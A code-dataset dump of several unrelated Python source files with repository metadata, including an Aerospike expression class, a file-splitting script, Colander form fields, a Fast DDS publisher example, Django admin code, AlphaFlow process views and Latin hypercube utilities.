""" Args:
ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
return_type (int): Value specifying what should be returned from the operation.
This should be one of the :ref:`list_return_types` values.
rank (TypeRank): Rank integer or integer expression of first element to get.
count (TypeCount): Count integer or integer expression for how many elements to get.
bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.
:return: Expression.
Example::
# Get the 3 smallest elements in list bin "a".
expr = exp.ListGetByRankRange(None, aerospike.LIST_RETURN_VALUE, 0, 3, exp.ListBin("a")).compile()
"""
self._children = (
rank,
count,
bin if isinstance(bin, _BaseExpr) else ListBin(bin)
)
self._fixed = {_Keys.RETURN_TYPE_KEY: return_type}
if ctx is not None:
self._fixed[_Keys.CTX_KEY] = ctx
| 0 | 0 | 0 |
f63c55bac69dfb491106ccd06c919a0136dd5de3 | 885 | py | Python | files/split.py | acepj60/MkCheck | 7765cfad3e7ef198945fa2fe70c1b3cb8f9e5290 | [
"Unlicense"
] | 1 | 2021-11-06T23:02:22.000Z | 2021-11-06T23:02:22.000Z | files/split.py | whiterabb17/MkCheck | 567ab17743209e08e5d8d391a8eaf217cb0dd3c5 | [
"Unlicense"
] | null | null | null | files/split.py | whiterabb17/MkCheck | 567ab17743209e08e5d8d391a8eaf217cb0dd3c5 | [
"Unlicense"
] | null | null | null | #/usr/bin/env python3
my_file = '/opt/MkCheck/files/tiks.txt'
sorting = True
hold_lines = []
with open(my_file,'r') as text_file:
for row in text_file:
hold_lines.append(row)
outer_count = 1
line_count = 0
while sorting:
count = 0
increment = (outer_count-1) * 51
left = len(hold_lines) - increment
file_name = "/opt/MkCheck/files/small_file_" + str(outer_count * 51) + ".txt"
hold_new_lines = []
if left < 51:
while count < left:
hold_new_lines.append(hold_lines[line_count])
count += 1
line_count += 1
sorting = False
else:
while count < 51:
hold_new_lines.append(hold_lines[line_count])
count += 1
line_count += 1
outer_count += 1
with open(file_name,'w') as next_file:
for row in hold_new_lines:
next_file.write(row)
| 28.548387 | 81 | 0.6 | #/usr/bin/env python3
my_file = '/opt/MkCheck/files/tiks.txt'
sorting = True
hold_lines = []
with open(my_file,'r') as text_file:
for row in text_file:
hold_lines.append(row)
outer_count = 1
line_count = 0
while sorting:
count = 0
increment = (outer_count-1) * 51
left = len(hold_lines) - increment
file_name = "/opt/MkCheck/files/small_file_" + str(outer_count * 51) + ".txt"
hold_new_lines = []
if left < 51:
while count < left:
hold_new_lines.append(hold_lines[line_count])
count += 1
line_count += 1
sorting = False
else:
while count < 51:
hold_new_lines.append(hold_lines[line_count])
count += 1
line_count += 1
outer_count += 1
with open(file_name,'w') as next_file:
for row in hold_new_lines:
next_file.write(row)
| 0 | 0 | 0 |
468df631c0ced920bcc593cd678b29e0a5f82a05 | 3,710 | py | Python | websauna/system/form/fields.py | maikroeder/websauna | fd266cf5e4761cd4c1f3e33be47ad8358b4c6afa | [
"CNRI-Python"
] | null | null | null | websauna/system/form/fields.py | maikroeder/websauna | fd266cf5e4761cd4c1f3e33be47ad8358b4c6afa | [
"CNRI-Python"
] | null | null | null | websauna/system/form/fields.py | maikroeder/websauna | fd266cf5e4761cd4c1f3e33be47ad8358b4c6afa | [
"CNRI-Python"
] | 1 | 2021-04-15T17:35:57.000Z | 2021-04-15T17:35:57.000Z | import enum
import json
import colander
import deform
from websauna.compat.typing import Union
from websauna.compat.typing import Callable
from websauna.system.model.json import NestedMutationDict, NestedMutationList, json_serializer
def defer_widget_values(widget: type, values_callback: Callable, **kwargs) -> deform.widget.Widget:
"""Allow select or checkbox widget values construction deferred during the execution time.
:param widget: Any Deform widget class, see :py:class:`deform.widget.Widget`
:param value_callback: This callable(node, kw) is called deferredly by Colander
:param kwargs: Passed to the widget constructed
"""
_widget = widget
@colander.deferred
return _inner
class UUID(colander.String):
"""UUID field for Colander.
See also :py:class`websauna.system.form.widgets.FriendlyUUIDWidget`.
"""
class EnumValue(colander.String):
"""Allow choice of python enum.Enum in colander schemas.
Example:
.. code-block:: python
class AssetClass(enum.Enum):
'''What's preferred display format for this asset.'''
fiat = "fiat"
cryptocurrency = "cryptocurrency"
token = "token"
tokenized_shares = "tokenized_shares"
ether = "ether"
class Schema(CSRFSchema):
asset_class = colander.SchemaNode(
EnumValue(AssetClass),
widget=deform.widget.SelectWidget(values=enum_values(AssetClass)))
"""
def deserialize(self, node: colander.SchemaNode, cstruct: str):
"""Parse incoming form values to Python objects if needed.
"""
if cstruct:
return self.enum_class(cstruct)
else:
return None
def serialize(self, node: colander.SchemaNode, _enum: enum.Enum) -> str:
"""Convert Enum object to str for widget processing."""
if _enum:
assert isinstance(_enum, self.enum_class), "Expected {}, got {}".format(self.enum_class, _enum)
return _enum.value
else:
return _enum
class JSONValue(colander.String):
"""Serialize / deserialize JSON fields.
Example:
.. code-block:: python
class AssetSchema(CSRFSchema):
name = colander.SchemaNode(colander.String())
other_data = colander.SchemaNode(
JSONValue(),
widget=JSONWidget(),
description="JSON bag of attributes of the object")
"""
def deserialize(self, node: colander.SchemaNode, cstruct: str):
"""Parse incoming form values to Python objects if needed.
"""
if cstruct:
try:
return json.loads(cstruct)
except json.JSONDecodeError as e:
raise colander.Invalid(node, "Not valid JSON") from e
else:
return None
def serialize(self, node: colander.SchemaNode, data: Union[list, dict]) -> str:
"""Convert Python objects to JSON string."""
if data:
assert isinstance(data, (list, dict, NestedMutationDict, NestedMutationList)), "Expected list or dict, got {}".format(data.__class__)
return json_serializer(data)
else:
# Noneish
return data | 30.162602 | 145 | 0.634232 | import enum
import json
import colander
import deform
from websauna.compat.typing import Union
from websauna.compat.typing import Callable
from websauna.system.model.json import NestedMutationDict, NestedMutationList, json_serializer
def defer_widget_values(widget: type, values_callback: Callable, **kwargs) -> deform.widget.Widget:
"""Allow select or checkbox widget values construction deferred during the execution time.
:param widget: Any Deform widget class, see :py:class:`deform.widget.Widget`
:param value_callback: This callable(node, kw) is called deferredly by Colander
:param kwargs: Passed to the widget constructed
"""
_widget = widget
@colander.deferred
def _inner(node, kw):
widget = _widget(values=values_callback(node, kw))
return widget
return _inner
class UUID(colander.String):
"""UUID field for Colander.
See also :py:class`websauna.system.form.widgets.FriendlyUUIDWidget`.
"""
def serialize(self, node, appstruct):
# Assume widgets can handle raw UUID object
return appstruct
class EnumValue(colander.String):
"""Allow choice of python enum.Enum in colander schemas.
Example:
.. code-block:: python
class AssetClass(enum.Enum):
'''What's preferred display format for this asset.'''
fiat = "fiat"
cryptocurrency = "cryptocurrency"
token = "token"
tokenized_shares = "tokenized_shares"
ether = "ether"
class Schema(CSRFSchema):
asset_class = colander.SchemaNode(
EnumValue(AssetClass),
widget=deform.widget.SelectWidget(values=enum_values(AssetClass)))
"""
def __init__(self, enum_class: type):
super().__init__()
assert issubclass(enum_class, enum.Enum), "Expected Enum, got {}".format(enum_class)
self.enum_class = enum_class
def deserialize(self, node: colander.SchemaNode, cstruct: str):
"""Parse incoming form values to Python objects if needed.
"""
if cstruct:
return self.enum_class(cstruct)
else:
return None
def serialize(self, node: colander.SchemaNode, _enum: enum.Enum) -> str:
"""Convert Enum object to str for widget processing."""
if _enum:
assert isinstance(_enum, self.enum_class), "Expected {}, got {}".format(self.enum_class, _enum)
return _enum.value
else:
return _enum
class JSONValue(colander.String):
"""Serialize / deserialize JSON fields.
Example:
.. code-block:: python
class AssetSchema(CSRFSchema):
name = colander.SchemaNode(colander.String())
other_data = colander.SchemaNode(
JSONValue(),
widget=JSONWidget(),
description="JSON bag of attributes of the object")
"""
def deserialize(self, node: colander.SchemaNode, cstruct: str):
"""Parse incoming form values to Python objects if needed.
"""
if cstruct:
try:
return json.loads(cstruct)
except json.JSONDecodeError as e:
raise colander.Invalid(node, "Not valid JSON") from e
else:
return None
def serialize(self, node: colander.SchemaNode, data: Union[list, dict]) -> str:
"""Convert Python objects to JSON string."""
if data:
assert isinstance(data, (list, dict, NestedMutationDict, NestedMutationList)), "Expected list or dict, got {}".format(data.__class__)
return json_serializer(data)
else:
# Noneish
return data | 347 | 0 | 80 |
c5d192f0d3e6f2a85910c1d1c34a01b007447f70 | 4,044 | py | Python | code/Examples/Python/HelloWorld/HelloWorldPublisher.py | xander-m2k/Fast-DDS-docs | 13e20cd24e159cdb5f2e7ab1fdb87880c2370aa0 | [
"Apache-2.0"
] | null | null | null | code/Examples/Python/HelloWorld/HelloWorldPublisher.py | xander-m2k/Fast-DDS-docs | 13e20cd24e159cdb5f2e7ab1fdb87880c2370aa0 | [
"Apache-2.0"
] | null | null | null | code/Examples/Python/HelloWorld/HelloWorldPublisher.py | xander-m2k/Fast-DDS-docs | 13e20cd24e159cdb5f2e7ab1fdb87880c2370aa0 | [
"Apache-2.0"
] | null | null | null | # Copyright 2022 Proyectos y Sistemas de Mantenimiento SL (eProsima).
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
HelloWorld Publisher
"""
from threading import Condition
import time
import fastdds
import HelloWorld
DESCRIPTION = """HelloWorld Publisher example for Fast DDS python bindings"""
USAGE = ('python3 HelloWorldPublisher.py')
if __name__ == '__main__':
print('Starting publisher.')
writer = Writer()
writer.run()
exit()
| 35.165217 | 117 | 0.691642 | # Copyright 2022 Proyectos y Sistemas de Mantenimiento SL (eProsima).
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
HelloWorld Publisher
"""
from threading import Condition
import time
import fastdds
import HelloWorld
DESCRIPTION = """HelloWorld Publisher example for Fast DDS python bindings"""
USAGE = ('python3 HelloWorldPublisher.py')
class WriterListener (fastdds.DataWriterListener) :
def __init__(self, writer) :
self._writer = writer
super().__init__()
def on_publication_matched(self, datawriter, info) :
if (0 < info.current_count_change) :
print ("Publisher matched subscriber {}".format(info.last_subscription_handle))
self._writer._cvDiscovery.acquire()
self._writer._matched_reader += 1
self._writer._cvDiscovery.notify()
self._writer._cvDiscovery.release()
else :
print ("Publisher unmatched subscriber {}".format(info.last_subscription_handle))
self._writer._cvDiscovery.acquire()
self._writer._matched_reader -= 1
self._writer._cvDiscovery.notify()
self._writer._cvDiscovery.release()
class Writer:
def __init__(self):
self._matched_reader = 0
self._cvDiscovery = Condition()
self.index = 0
factory = fastdds.DomainParticipantFactory.get_instance()
self.participant_qos = fastdds.DomainParticipantQos()
factory.get_default_participant_qos(self.participant_qos)
self.participant = factory.create_participant(0, self.participant_qos)
self.topic_data_type = HelloWorld.HelloWorldPubSubType()
self.topic_data_type.setName("HelloWorld")
self.type_support = fastdds.TypeSupport(self.topic_data_type)
self.participant.register_type(self.type_support)
self.topic_qos = fastdds.TopicQos()
self.participant.get_default_topic_qos(self.topic_qos)
self.topic = self.participant.create_topic("HelloWorldTopic", self.topic_data_type.getName(), self.topic_qos)
self.publisher_qos = fastdds.PublisherQos()
self.participant.get_default_publisher_qos(self.publisher_qos)
self.publisher = self.participant.create_publisher(self.publisher_qos)
self.listener = WriterListener(self)
self.writer_qos = fastdds.DataWriterQos()
self.publisher.get_default_datawriter_qos(self.writer_qos)
self.writer = self.publisher.create_datawriter(self.topic, self.writer_qos, self.listener)
def write(self):
data = HelloWorld.HelloWorld()
data.message("Hello World")
data.index(self.index)
self.writer.write(data)
print("Sending {message} : {index}".format(message=data.message(), index=data.index()))
self.index = self.index + 1
def wait_discovery(self) :
self._cvDiscovery.acquire()
print ("Writer is waiting discovery...")
self._cvDiscovery.wait_for(lambda : self._matched_reader != 0)
self._cvDiscovery.release()
print("Writer discovery finished...")
def run(self):
self.wait_discovery()
for x in range(10) :
time.sleep(1)
self.write()
self.delete()
def delete(self):
factory = fastdds.DomainParticipantFactory.get_instance()
self.participant.delete_contained_entities()
factory.delete_participant(self.participant)
if __name__ == '__main__':
print('Starting publisher.')
writer = Writer()
writer.run()
exit()
| 2,824 | 22 | 234 |
86f75c2522b6bfb188910c0c2dfff8de507bbbd7 | 772 | py | Python | mainapp/accounts/admin.py | mfjimenezco/django-adminlte-base | 00384e62e408e43b5a178bd180d7fb4aff134b2b | [
"MIT"
] | null | null | null | mainapp/accounts/admin.py | mfjimenezco/django-adminlte-base | 00384e62e408e43b5a178bd180d7fb4aff134b2b | [
"MIT"
] | null | null | null | mainapp/accounts/admin.py | mfjimenezco/django-adminlte-base | 00384e62e408e43b5a178bd180d7fb4aff134b2b | [
"MIT"
] | null | null | null | """
Account admin register.
"""
# Django
from django.contrib import admin
from django.contrib import messages
# Models
from accounts.models import UserRequest
@admin.register(UserRequest)
class UserRequestAdmin(admin.ModelAdmin):
"""User Request Admin"""
list_display = (
'username',
'email',
'is_accepted',
)
search_fields = (
'username',
'email',
)
list_filter = (
'is_accepted',
)
list_editable = ('is_accepted',) | 22.705882 | 80 | 0.619171 | """
Account admin register.
"""
# Django
from django.contrib import admin
from django.contrib import messages
# Models
from accounts.models import UserRequest
@admin.register(UserRequest)
class UserRequestAdmin(admin.ModelAdmin):
"""User Request Admin"""
list_display = (
'username',
'email',
'is_accepted',
)
search_fields = (
'username',
'email',
)
list_filter = (
'is_accepted',
)
list_editable = ('is_accepted',)
def save_model(self, request, obj, form, change):
try:
super(UserRequestAdmin, self).save_model(request, obj, form, change)
except Exception as e:
# Add error message
messages.add_message(request, messages.ERROR, e) | 246 | 0 | 26 |
b8169855ec0aaf15dc5d25cc4a2e7fb043cb45d6 | 33 | py | Python | tests/__init__.py | fundamentals-of-data-science/ct1 | 26a0abf06fd4324636d7944369d6a8be2d66ec71 | [
"MIT"
] | null | null | null | tests/__init__.py | fundamentals-of-data-science/ct1 | 26a0abf06fd4324636d7944369d6a8be2d66ec71 | [
"MIT"
] | 134 | 2020-12-14T08:21:54.000Z | 2022-03-31T21:06:13.000Z | tests/__init__.py | fundamentals-of-data-science/ct1 | 26a0abf06fd4324636d7944369d6a8be2d66ec71 | [
"MIT"
] | null | null | null | """Unit test package for ct1."""
| 16.5 | 32 | 0.636364 | """Unit test package for ct1."""
| 0 | 0 | 0 |
a9fc4344ed64e93da9a289bce09caae40d52fb57 | 141 | py | Python | src/compath_resources/exporters/__init__.py | ComPath/resources | e8da7b511c2b558b8fd0bf38888b512008ac1ba3 | [
"MIT"
] | 3 | 2018-05-14T14:46:39.000Z | 2019-06-20T10:28:26.000Z | src/compath_resources/exporters/__init__.py | ComPath/compath-resources | e8da7b511c2b558b8fd0bf38888b512008ac1ba3 | [
"MIT"
] | 13 | 2020-03-28T13:36:32.000Z | 2021-01-19T15:00:07.000Z | src/compath_resources/exporters/__init__.py | ComPath/resources | e8da7b511c2b558b8fd0bf38888b512008ac1ba3 | [
"MIT"
] | 1 | 2021-12-01T09:49:59.000Z | 2021-12-01T09:49:59.000Z | # -*- coding: utf-8 -*-
"""Exporters for ComPath resources."""
from .bel import get_bel # noqa:F401
from .rdf import get_rdf # noqa:F401
| 20.142857 | 38 | 0.666667 | # -*- coding: utf-8 -*-
"""Exporters for ComPath resources."""
from .bel import get_bel # noqa:F401
from .rdf import get_rdf # noqa:F401
| 0 | 0 | 0 |
a1bafe40f9d60a18d8fce01e601bfa263bc96c72 | 183 | py | Python | bindings/python/examples/Restore.py | Fimbure/icebox-1 | 0b81992a53e1b410955ca89bdb6f8169d6f2da86 | [
"MIT"
] | 521 | 2019-03-29T15:44:08.000Z | 2022-03-22T09:46:19.000Z | bindings/python/examples/Restore.py | Fimbure/icebox-1 | 0b81992a53e1b410955ca89bdb6f8169d6f2da86 | [
"MIT"
] | 30 | 2019-06-04T17:00:49.000Z | 2021-09-08T20:44:19.000Z | bindings/python/examples/Restore.py | Fimbure/icebox-1 | 0b81992a53e1b410955ca89bdb6f8169d6f2da86 | [
"MIT"
] | 99 | 2019-03-29T16:04:13.000Z | 2022-03-28T16:59:34.000Z | import struct
from PyFDP.FDP import FDP
if __name__ == '__main__':
#fdp = FDP("7_SP1_x64")
fdp = FDP("8_1_x64")
#fdp = FDP("10_x64")
fdp.Restore()
| 15.25 | 27 | 0.551913 | import struct
from PyFDP.FDP import FDP
if __name__ == '__main__':
#fdp = FDP("7_SP1_x64")
fdp = FDP("8_1_x64")
#fdp = FDP("10_x64")
fdp.Restore()
| 0 | 0 | 0 |
1c400f0eed5bedcf15ac83b8b0358c7c54ae6b43 | 21 | py | Python | salad/__init__.py | Work4Labs/salad | 176869a4437103d501feb3035beaf162c2507435 | [
"BSD-3-Clause"
] | null | null | null | salad/__init__.py | Work4Labs/salad | 176869a4437103d501feb3035beaf162c2507435 | [
"BSD-3-Clause"
] | null | null | null | salad/__init__.py | Work4Labs/salad | 176869a4437103d501feb3035beaf162c2507435 | [
"BSD-3-Clause"
] | null | null | null | VERSION = "0.4.14.2"
| 10.5 | 20 | 0.571429 | VERSION = "0.4.14.2"
| 0 | 0 | 0 |
0664b5cd87247d123675d6ed514eb83e81d53698 | 3,755 | py | Python | utils/attention_plotter_utils.py | inboxedshoe/attention-learn-to-route | d9ebb13ec7e06fc5d2373c851a13913dab1594fc | [
"MIT"
] | null | null | null | utils/attention_plotter_utils.py | inboxedshoe/attention-learn-to-route | d9ebb13ec7e06fc5d2373c851a13913dab1594fc | [
"MIT"
] | null | null | null | utils/attention_plotter_utils.py | inboxedshoe/attention-learn-to-route | d9ebb13ec7e06fc5d2373c851a13913dab1594fc | [
"MIT"
] | null | null | null |
import numpy as np
import plotly.graph_objs as go
import networkx as nx
#creates the data graph instance
#this will create our initial plotly graph to display
| 29.108527 | 88 | 0.530226 |
import numpy as np
import plotly.graph_objs as go
import networkx as nx
#creates the data graph instance
def generate_graph(pts, instance=0, dictionary=True):
if not dictionary:
# temp demand list with depot and nodes
temp_demand = pts[instance][2]
temp_demand.insert(0, 0)
# temp pos list with depot and nodes
temp_pos = pts[instance][1]
temp_pos.insert(0, pts[instance][0])
else:
# temp demand list with depot and nodes
temp_demand = pts["demand"][instance].cpu().tolist()
temp_demand.insert(0, 0)
# temp demand list with depot and nodes
temp_pos = pts["loc"][instance].cpu().tolist()
temp_pos.insert(0, pts["depot"][instance].cpu().tolist())
graph = nx.complete_graph(len(temp_pos))
for i in range(0, len(temp_pos)):
graph.add_node(i, pos=temp_pos[i], demand=temp_demand[i])
# create fully_connected
# graph = nx.complete_graph(graph)
# set attributes
# nx.set_node_attributes(graph, dict(enumerate(temp_demand) ), "demand")
return graph
#this will create our initial plotly graph to display
def create_plotly(G, logs):
#get the nodes and edges
edge_x = []
edge_y = []
for edge in G.edges():
x0, y0 = G.nodes[edge[0]]['pos']
x1, y1 = G.nodes[edge[1]]['pos']
edge_x.append(x0)
edge_x.append(x1)
edge_x.append(None)
edge_y.append(y0)
edge_y.append(y1)
edge_y.append(None)
#create a scatter plot
edge_trace = go.Scatter(
x=edge_x, y=edge_y,
line=dict(width=0.5, color='#888'),
hoverinfo='none',
mode='lines')
#place the nodes in the respective position in the plot
node_x = []
node_y = []
for node in G.nodes():
x, y = G.nodes[node]['pos']
node_x.append(x)
node_y.append(y)
#customize the nodes (change color, shape....)
node_trace = go.Scatter(
x=node_x, y=node_y,
mode='markers',
hoverinfo='text',
marker=dict(
showscale=True,
# colorscale options
# 'Greys' | 'YlGnBu' | 'Greens' | 'YlOrRd' | 'Bluered' | 'RdBu' |
# 'Reds' | 'Blues' | 'Picnic' | 'Rainbow' | 'Portland' | 'Jet' |
# 'Hot' | 'Blackbody' | 'Earth' | 'Electric' | 'Viridis' |
colorscale='YlOrRd',
reversescale=False,
color=[],
size=15,
colorbar=dict(
thickness=15,
title='attention_prob',
xanchor='left',
titleside='right'
),
line_width=2))
node_trace.marker.color = np.exp(logs[0])
node_trace.text = np.exp(logs[0])
node_trace.marker.line.color = "black"
node_trace.marker.symbol = ["square"]
# draw
fig = go.Figure(data=[edge_trace, node_trace],
layout=go.Layout(
title='',
titlefont_size=16,
showlegend=False,
hovermode='closest',
margin=dict(b=20, l=5, r=5, t=40),
annotations=[dict(
text="",
showarrow=False,
xref="paper", yref="paper",
x=0.005, y=-0.002)],
xaxis=dict(showgrid=False, zeroline=False, showticklabels=True),
yaxis=dict(showgrid=False, zeroline=False, showticklabels=True))
)
fig.update_layout(
width=800,
height=800
)
fig.update_yaxes(
scaleanchor="x",
scaleratio=1,
)
return fig
| 3,547 | 0 | 44 |
743b485b8add2d51b33af6b72fb698306723a312 | 2,848 | py | Python | GAparsimony/lhs/util/utilityLHS.py | misantam/GAparsimony | 0241092dc5d7741b5546151ff829167588e4f703 | [
"MIT"
] | null | null | null | GAparsimony/lhs/util/utilityLHS.py | misantam/GAparsimony | 0241092dc5d7741b5546151ff829167588e4f703 | [
"MIT"
] | 1 | 2021-12-05T10:24:55.000Z | 2021-12-05T11:01:25.000Z | GAparsimony/lhs/util/utilityLHS.py | misantam/GAparsimony | 0241092dc5d7741b5546151ff829167588e4f703 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import numpy as np
from .bclib import inner_product
| 28.19802 | 104 | 0.572331 | # -*- coding: utf-8 -*-
import numpy as np
from .bclib import inner_product
def isValidLHS_int(matrix):
for jcol in range(matrix.shape[1]):
total = 0
for irow in range(matrix.shape[0]):
total = total + matrix[irow, jcol]
if not total == int(matrix.shape[0] * (matrix.shape[0] + 1) / 2):
return False
return True
def isValidLHS(matrix):
n = matrix.shape[0]
k = matrix.shape[1]
resultint = np.empty((n, k))
# for (;it != result.end(); ++it, ++iti) # Itera sobre filas, fichero matrix.h
for i in range(matrix.shape[0]):
resultint[i] = 1 + (np.floor(np.double(n) * (matrix[i]))).astype(np.int32)
for jcol in range(resultint.shape[1]):
total = 0
for irow in range(resultint.shape[0]):
total = total + resultint[irow, jcol]
if not total == int(resultint.shape[0] * (resultint.shape[0] + 1) / 2):
return False
return True
def initializeAvailableMatrix(i, j):
dev = np.empty((i, j)).astype(np.double)
for irow in range(i):
for jcol in range(j):
dev[irow, jcol] = np.double(jcol + 1)
return dev
def runif_std(n):
dev = np.empty(n).astype(np.double)
for i in range(n):
dev[i] =np.random.uniform(low=0, high=1)
return dev
def convertIntegerToNumericLhs(intMat):
n = intMat.shape[0]
k = intMat.shape[1]
result = np.empty((n, k))
eps = np.random.rand(n*k)
counter = 0
# // I think this is right (iterate over rows within columns
for col in range(k):
for row in range(n):
result[row, col] = np.double(intMat[row, col] - 1) + eps[counter]
result[row, col] = result[row, col] / np.double(n)
counter+=1
return result
def sumInvDistance(a):
return np.sum(calculateDistance(a)[::-1]) # equals to accumulate
def calculateDistanceSquared(a, b):
if a.shape != b.shape:
raise Exception("Inputs of a different size")
return inner_product(a, b, np.double(0), lambda a, b: a+b, lambda x, y: (x-y) * (x-y))
def calculateDistance(mat):
m_rows = mat.shape[0]
result = np.empty((m_rows, m_rows)).astype(np.double)
for i in range(m_rows - 1):
for j in range(i+1, m_rows):
result[i,j] = np.sqrt(np.double(calculateDistanceSquared(mat[i,:], mat[j,:])))
return result
def calculateSOptimal(mat):
return 1.0 / sumInvDistance(mat)
def runifint(a, b, n=None):
if not n:
return a + (np.floor((np.random.uniform(low=0, high=1) * (np.double(b) + 1.0 - np.double(a)))))
else:
result = np.empty(n).astype(np.double)
r = runif_std(n)
for i in range(n):
result[i] = a + (np.floor(r[i] * (b + 1.0 - b + 1.0 - a)))
return result
| 2,511 | 0 | 239 |
ca26151593854c11dd77251a6952907ae9d39bb6 | 5,212 | py | Python | browser/process.py | gocept/alphaflow | 4b797cb12fb52254b1884159fd9a8b899c739f7c | [
"ZPL-2.1",
"ZPL-2.0"
] | null | null | null | browser/process.py | gocept/alphaflow | 4b797cb12fb52254b1884159fd9a8b899c739f7c | [
"ZPL-2.1",
"ZPL-2.0"
] | null | null | null | browser/process.py | gocept/alphaflow | 4b797cb12fb52254b1884159fd9a8b899c739f7c | [
"ZPL-2.1",
"ZPL-2.0"
] | 1 | 2021-11-01T07:58:18.000Z | 2021-11-01T07:58:18.000Z | # Copyright (c) 2007 gocept gmbh & co. kg
# See also LICENSE.txt
# $Id$
"""Process related views"""
import zope.component
from Products.CMFCore.utils import getToolByName
from Products.Archetypes.config import UID_CATALOG
import Products.AlphaFlow.interfaces
import Products.AlphaFlow.process
from Products.AlphaFlow.browser.base import AlphaFlowView
import Products.AlphaFlow.utils
class ProcessReadContainer(AlphaFlowView):
"""Management view for readable process containers.
"""
class ProcessWriteContainer(AlphaFlowView):
"""Management view for writeable process containers."""
def addProcess(self, title, redirect):
"""Adds new process to process manager."""
id = Products.AlphaFlow.utils.generateUniqueId('process')
process = self.context[id] = Products.AlphaFlow.process.Process(id)
editable = process.editable(
Products.AlphaFlow.process.ProcessVersion())
editable.title = title
status = "?portal_status_message=Workflow created"
self.request.response.redirect(redirect + status)
class PortalProcesses(AlphaFlowView):
"""Management view for all processes within a portal at once."""
| 34.289474 | 76 | 0.646969 | # Copyright (c) 2007 gocept gmbh & co. kg
# See also LICENSE.txt
# $Id$
"""Process related views"""
import zope.component
from Products.CMFCore.utils import getToolByName
from Products.Archetypes.config import UID_CATALOG
import Products.AlphaFlow.interfaces
import Products.AlphaFlow.process
from Products.AlphaFlow.browser.base import AlphaFlowView
import Products.AlphaFlow.utils
class Process(AlphaFlowView):
def manage_update(self, redirect):
self.context.update()
self.request.response.redirect(redirect)
def update(self, redirect):
self.context.update()
status = "?portal_status_message=Workflow updated"
self.request.response.redirect(redirect + status)
class ProcessVersion(AlphaFlowView):
def restartInstances(self, redirect):
pm = getToolByName(self.context, "workflow_manager")
pm.replaceInstances(self.context)
status = "?portal_status_message=" \
"Instances restarted using current workflow version"
self.request.response.redirect(redirect+status)
def make_editable(self, redirect):
self.context.copyToCurrent()
container = self.context.acquireProcess().getParentNode()
status = "?portal_status_message=" \
"Copied version '%s'." % self.context.getId()
self.request.response.redirect(redirect+status)
class ProcessReadContainer(AlphaFlowView):
"""Management view for readable process containers.
"""
def __init__(self, *args, **kwargs):
super(ProcessReadContainer, self).__init__(*args, **kwargs)
def is_global(self):
# XXX ???
return False
def list(self):
for obj in self.context.objectValues():
if Products.AlphaFlow.interfaces.IProcess.providedBy(obj):
yield obj
class ProcessWriteContainer(AlphaFlowView):
"""Management view for writeable process containers."""
def __init__(self, *args, **kwargs):
super(ProcessWriteContainer, self).__init__(*args, **kwargs)
def _redirect(self):
self.request.response.redirect(self.context.absolute_url() +
"/manage_processes")
def manage_addProcess(self, id):
self.context[id] = Products.AlphaFlow.process.Process(id)
self._redirect()
def addProcess(self, title, redirect):
"""Adds new process to process manager."""
id = Products.AlphaFlow.utils.generateUniqueId('process')
process = self.context[id] = Products.AlphaFlow.process.Process(id)
editable = process.editable(
Products.AlphaFlow.process.ProcessVersion())
editable.title = title
status = "?portal_status_message=Workflow created"
self.request.response.redirect(redirect + status)
def manage_removeProcess(self, id, redirect):
del self.context[id]
self.request.response.redirect(redirect)
def removeProcess(self, id, redirect):
del self.context[id]
status = "?portal_status_message=Workflow deleted"
self.request.response.redirect(redirect + status)
def manage_importXML(self, id, xmlfile):
importer = zope.component.getUtility(
Products.AlphaFlow.interfaces.IWorkflowImporter, name='xml')
version = importer(xmlfile)
self.context[id] = Products.AlphaFlow.process.Process(id)
process = self.context[id]
process.editable(version)
self._redirect()
class PortalProcesses(AlphaFlowView):
"""Management view for all processes within a portal at once."""
def list_by_path(self):
GLOBAL_TITLE = "Global process definitions"
def manage_url(container):
return container.absolute_url() + "/@@manage_processes"
def plone_url(container):
return container.absolute_url() + "/@@alphaflow_processes"
pm = getToolByName(self, "workflow_manager")
cat = getToolByName(self, UID_CATALOG)
processes_by_container = {}
for process in pm.listProcessDefinitions():
container = process.getParentNode()
processes_by_container.setdefault(container, []).append(process)
global_container_path = '/'.join(pm.processes.getPhysicalPath())
processes_by_path = {}
for container, processes in processes_by_container.items():
path = '/'.join(container.getPhysicalPath())
if path.startswith(global_container_path):
path = None
title = GLOBAL_TITLE
else:
title = container.title_or_id()
processes_by_path[path] = {
"manage_url": manage_url(container),
"plone_url": plone_url(container),
"title": title,
"processes": processes,
}
if None not in processes_by_path:
processes_by_path[None] = {
"manage_url": manage_url(pm.processes),
"plone_url": plone_url(pm.processes),
"title": GLOBAL_TITLE,
"processes": [],
}
return [data for path, data in sorted(processes_by_path.items())]
| 3,572 | 23 | 424 |
93e18ce7f40ed19716c2eff6ecac85730cb2095f | 1,224 | py | Python | VimbaCam/ColorMap/ehtplot/build/lib/ehtplot/color/merge.py | zzpwahaha/VimbaCamJILA | 3baed1b5313e6c198d54a33c2c84357035d5146a | [
"MIT"
] | 1 | 2021-06-14T11:51:37.000Z | 2021-06-14T11:51:37.000Z | VimbaCam/ColorMap/ehtplot/build/lib/ehtplot/color/merge.py | zzpwahaha/VimbaCamJILA | 3baed1b5313e6c198d54a33c2c84357035d5146a | [
"MIT"
] | null | null | null | VimbaCam/ColorMap/ehtplot/build/lib/ehtplot/color/merge.py | zzpwahaha/VimbaCamJILA | 3baed1b5313e6c198d54a33c2c84357035d5146a | [
"MIT"
] | 2 | 2021-01-20T16:22:57.000Z | 2021-02-14T12:31:02.000Z | #!/usr/bin/env python3
#
# Copyright (C) 2018--2019 Chi-kwan Chan
# Copyright (C) 2018--2019 Steward Observatory
#
# This file is part of ehtplot.
#
